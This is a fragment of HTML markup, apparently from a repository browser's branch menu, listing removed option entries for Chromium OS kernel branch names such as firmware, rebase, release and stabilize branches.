-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-squawks-5216.152.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-squawks-5216.152.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-squawks-5216.152.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-squawks-5216.152.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-storm-6315.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-storm-6315.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-stout-2817.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-stout-2817.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-strago-7287.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-strago-7287.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-sumo-5216.382.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-sumo-5216.382.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-sumo-5216.382.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-sumo-5216.382.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-swanky-5216.238.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-swanky-5216.238.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-swanky-5216.238.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-swanky-5216.238.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-terra-7287.154.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-terra-7287.154.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tidus-6301.109.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tidus-6301.109.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tricky-5829.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tricky-5829.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tricky-5829.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tricky-5829.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tricky-5829.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-tricky-5829.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-u-boot-v1'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-u-boot-v1</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-uboot_v2-1299.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-uboot_v2-1299.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-ultima-7287.131.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-ultima-7287.131.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.1.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.1.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.1.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.1.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.265.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.265.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.265.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-winky-5216.265.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-wolf-4389.24.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-wolf-4389.24.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-yuna-6301.59.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-yuna-6301.59.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5216.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5216.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5216.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5216.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.17.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.17.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.17.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.17.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-zako-5219.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/foo-test'>caf/3.10/caf/chromium-googlesource-kernel-next/foo-test</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/johannes-chromeos-3.18-Core18'>caf/3.10/caf/chromium-googlesource-kernel-next/johannes-chromeos-3.18-Core18</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/master'>caf/3.10/caf/chromium-googlesource-kernel-next/master</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/old-chromeos-3.18-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/old-chromeos-3.18-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/origin/chromeos-4.9-merge-170612'>caf/3.10/caf/chromium-googlesource-kernel-next/origin/chromeos-4.9-merge-170612</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/origin/chromeos-4.9-merge-latest'>caf/3.10/caf/chromium-googlesource-kernel-next/origin/chromeos-4.9-merge-latest</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/qualcomm-gobi-2000'>caf/3.10/caf/chromium-googlesource-kernel-next/qualcomm-gobi-2000</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/arm_platform+android'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/arm_platform+android</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/atmel_mxt_ts'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/atmel_mxt_ts</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/base'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/base-mm'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/base-mm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/bluetooth'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/bluetooth</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/chromeos-sysrq'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/chromeos-sysrq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cpufreq-interactive'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cpufreq-interactive</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cpuidle'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cpuidle</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cpuquiet'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cpuquiet</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cros_ec'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cros_ec</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cyapa'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/cyapa</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/devfreq'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/devfreq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/device-blacklist'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/device-blacklist</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/drm'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/drm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/elan_i2c'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/elan_i2c</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/google-firmware'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/google-firmware</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/gpio'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/gpio</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/hid-rmi'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/hid-rmi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/i2c-core'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/i2c-core</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/i2c-hid'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/i2c-hid</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/iio'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/iio</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/input'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/input</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/ipvlan'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/ipvlan</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/kasan'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/kasan</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/lowmem'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/lowmem</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/media'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/media</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/mfd'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/mfd</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/misc-drivers'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/misc-drivers</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/misc-upstream'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/misc-upstream</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/mmc'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/mmc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/mtd'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/mtd</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/nvmem'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/nvmem</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/phy'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/phy</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/power'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/power</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/regmap'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/regmap</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/security'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/security</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/sound'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/sound</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/thermal'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/thermal</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/tpm'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/tpm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/ubi'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/ubi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/usb-ohci-ehci'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/usb-ohci-ehci</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/usb-storage'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/usb-storage</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/usb-xhci'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/usb-xhci</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/verity-bootcache'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/verity-bootcache</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/watchdog'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/watchdog</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/wifi38'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/wifi38</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/wifi42'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/wifi42</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/wireless'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/wireless</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/x86_platform'>caf/3.10/caf/chromium-googlesource-kernel-next/rebase/kernel-3.18/x86_platform</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-1011.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-1011.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R16-1193.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R16-1193.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R17-1412.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R17-1412.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R18-1660.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R18-1660.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R19-2046.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R19-2046.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R20-2268.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R20-2268.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R21-2465.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R21-2465.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R22-2723.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R22-2723.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R23-2913.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R23-2913.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R25-3428.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R25-3428.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R26-3701.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R26-3701.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R27-3912.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R27-3912.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R28-4100.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R28-4100.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R29-4319.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R29-4319.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R30-4537.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R30-4537.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R31-4731.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R31-4731.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R32-4920.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R32-4920.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R33-5116.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R33-5116.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R33-5116.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R33-5116.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R34-5500.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R34-5500.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R34-5500.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R34-5500.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R35-5712.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R35-5712.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R35-5712.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R35-5712.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R35-5712.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R35-5712.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R36-5841.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R36-5841.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R36-5841.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R36-5841.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R36-5841.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R36-5841.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R37-5978.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R37-5978.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R38-6158.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R38-6158.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R39-6310.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R39-6310.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R40-6457.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R40-6457.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R43-6946.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R43-6946.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R44-7077.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R44-7077.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R45-7262.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R45-7262.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R46-7390.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R46-7390.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R50-7978.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R50-7978.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/release-R51-8172.B'>caf/3.10/caf/chromium-googlesource-kernel-next/release-R51-8172.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/sandbox/msb/exynos-drm-next'>caf/3.10/caf/chromium-googlesource-kernel-next/sandbox/msb/exynos-drm-next</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/sandbox/rebase/kernel-4.4/hid-rmi'>caf/3.10/caf/chromium-googlesource-kernel-next/sandbox/rebase/kernel-4.4/hid-rmi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.110.0'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.110.0</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.149'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.149</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.149.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.149.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.193'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3428.193</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3658.0.0'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3658.0.0</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.30.0'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.30.0</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.30.0b'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.30.0b</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.46.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.46.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.81.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3701.81.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3881.0.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3881.0.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3912.79.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-3912.79.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4008.0.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4008.0.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4035.0.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4035.0.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4068.0.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4068.0.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4100.38.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4100.38.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4255.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4255.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4287.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4287.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4443.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4443.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4512.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4512.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4537.118.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4537.118.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4537.147.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4537.147.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4636.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4636.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4701.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4701.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4731.31.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4731.31.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4731.62.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4731.62.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4731.85.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4731.85.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4825.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4825.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4856.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4856.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4886.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4886.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4920.6.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4920.6.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4982.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-4982.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5062.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5062.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5062.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5062.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5085.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5085.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5085.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5085.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.113.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.113.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.113.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.113.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.115.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.115.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.115.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.115.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.53.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.53.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.53.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.53.B-chromeos-3.8</option>
